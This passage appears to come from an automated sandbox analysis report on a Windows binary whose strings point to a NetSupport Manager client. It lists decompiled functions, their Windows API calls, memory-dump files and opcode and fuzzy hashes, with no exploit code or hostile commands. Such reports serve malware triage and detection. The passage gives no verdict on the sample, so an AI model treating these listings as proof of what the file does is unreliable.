                                                                                      • Instruction Fuzzy Hash: 7011A372E01118AFDB00DEA9DD45DEFB3B8EB94225F00816EF81597140DA71E914C761
                                                                                      Function 110D12F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wvsprintfA.USER32(?,?,00000000), ref: 110D1322
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                      • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                      • API String ID: 175691280-2052047905
                                                                                      • Opcode ID: 5efc2b1b499c19e22c0b11ea56c1799b84258173eef5baac531c406e2266982d
                                                                                      • Instruction ID: 2d49a6c718824c4fb39b7936eb355b27ab8e956fb5db8f47369f869790572c39
                                                                                      • Opcode Fuzzy Hash: 5efc2b1b499c19e22c0b11ea56c1799b84258173eef5baac531c406e2266982d
                                                                                      • Instruction Fuzzy Hash: 91F0F979B0021D6BCB01DFA4DC50BFEBBFC9B45208F044099EA04A7240DE706A05C7A5
                                                                                      Function 110D1370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                      • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                      • API String ID: 175691280-2052047905
                                                                                      • Opcode ID: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                      • Instruction ID: 95fe0cd820de1796fd70713afb7a02e85a0165c228f84a05359d3cb2f5b90ec5
                                                                                      • Opcode Fuzzy Hash: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                      • Instruction Fuzzy Hash: 4FF0A47AA0025CBBCB00DEA5DD40BEEFBBD9B45248F044199E608A7140DE706A45C7A5
                                                                                      Function 1109D3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                      • SetLastError.KERNEL32(00000078,00000000,?,1109E29C,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D42D
                                                                                      Strings
                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109D3FE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastProc
                                                                                      • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
                                                                                      • API String ID: 199729137-262600717
                                                                                      • Opcode ID: 72b6cad3dfc85a2363e3c34f7b358bf502283420fca47eee65f37d335c1a72b0
                                                                                      • Instruction ID: e717ac8c1df76163528922924e3c5170e1254239c9623c731bd739b822e2347b
                                                                                      • Opcode Fuzzy Hash: 72b6cad3dfc85a2363e3c34f7b358bf502283420fca47eee65f37d335c1a72b0
                                                                                      • Instruction Fuzzy Hash: C2F05E72A55228AFD724DFA4E844A97B7E8EB48720F00451AF95597240C670FC14DBA0
                                                                                      Function 11029170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread__wcstoi64
                                                                                      • String ID: *TapiFixPeriod$Bridge
                                                                                      • API String ID: 1152747075-2058455932
                                                                                      • Opcode ID: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                      • Instruction ID: bf80e38bc05b38b2fab7e3f27e0d367de778c9bee9065702c43ca09430eaf323
                                                                                      • Opcode Fuzzy Hash: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                      • Instruction Fuzzy Hash: 60F0E57074532D7EFB11DAD6CC45F79B6989300B08FA0003DF528551C8E6B1B9008766
                                                                                      Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                      • m_hWnd, xrefs: 11001096
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2046328329-2830328467
                                                                                      • Opcode ID: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                      • Instruction ID: 77f34a7b6d351dc7c2bdf78fd4e91b5ab9e9d0feae3f5383371c0572f9fc60e5
                                                                                      • Opcode Fuzzy Hash: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                      • Instruction Fuzzy Hash: 98E01ABA71025DBFD714CE95EC81EE7B3ACEB48364F008529FA2997640D6B0E85087A1
                                                                                      Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                      • m_hWnd, xrefs: 11001056
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 819365019-2830328467
                                                                                      • Opcode ID: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                      • Instruction ID: cf35a841ff9db8a25d072bdd62e9da3c8eef3a8b3e547f8f1cf52fd96b7d4918
                                                                                      • Opcode Fuzzy Hash: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                      • Instruction Fuzzy Hash: 3CE04FB570021DABD310CA95DC85ED7B39CEB54354F008429F92887600D6B0F89087A0
                                                                                      Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                      • m_hWnd, xrefs: 110010E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 906220102-2830328467
                                                                                      • Opcode ID: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                      • Instruction ID: e326bc5325dc434b8864e09602644acab64ba33727794dfa8c4f249b36814fc9
                                                                                      • Opcode Fuzzy Hash: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                      • Instruction Fuzzy Hash: 81E04FB970025DAFD314CA95DC45ED6B3ACEB54764F008429F92887600DA70F84087A0
                                                                                      Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                      • m_hWnd, xrefs: 11001126
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 1604732272-2830328467
                                                                                      • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                      • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                      • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                      • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
                                                                                      Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KillTimer.USER32(?,?), ref: 1100102B
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                      • m_hWnd, xrefs: 11001016
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2229609774-2830328467
                                                                                      • Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                      • Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
                                                                                      • Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                      • Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
                                                                                      Function 11143320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncpy
                                                                                      • String ID: 1000,50$1000,50
                                                                                      • API String ID: 2961919466-2776873633
